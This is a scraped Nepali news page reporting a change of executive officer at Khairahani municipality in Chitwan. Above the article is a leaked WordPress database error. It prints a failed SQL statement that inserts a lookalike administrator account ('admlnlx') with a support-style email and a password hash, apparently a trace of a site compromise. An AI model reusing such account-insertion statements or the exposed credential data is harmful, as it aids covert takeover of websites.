WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bjbq0zUdlZuAFC0ZQWliitHVuKqfBK/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:29:11', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २०–
पूर्वी चितवनको खैरहनी नगरपालिकाको कार्यकारी अधिकृत परिवर्तन भएको छ । नयाँ कार्यकारी अधिकृतको रुपमा गंगाबहादुर भुजेल आएका छन् ।
उनी मन्त्रालयबाट यहाँ आएका हुन् । भुजेलले सोमबार देखी कार्यभार समालेको नगरपालिका इन्जिनियर धनबहादुर तामाङले जानकारी दिए । खैरहनी आए देखिनै विवादित बनेका यसअघिका कार्यकारी अधिकृत अम्मरनाथ ढकालको भने रुपन्देहीको देवदह नगरपालिका सरुवा भई सकेको थियो । तर ढकाल अटेर गरि खैरहनीमै बसिरहेका थिए । नगरपालिकाको बिकासमा भन्दा पनि झनै उधोगतिमा लैजाने काम ढकालले गरेको भन्दै नगरका राजनितिक दल उनि प्रती रुस्ट थिए ।
नयाँ आएका कार्यकारी अधिकृत भुजेलले राजनीीतक दल, टोल बिकास समिती, वडा नागरिक मन्च, उद्योगी, ब्यापारीलगायत स्थानीयसंग समन्वय गरेर नगरको बिकासमा काम गर्ने बताएका छन् । यसअघिका कुरा बिर्सिएर नगरपालिकालार्इ सहयोग गर्न समेत उनले नगरबासिमा आग्रह गरेका छन् ।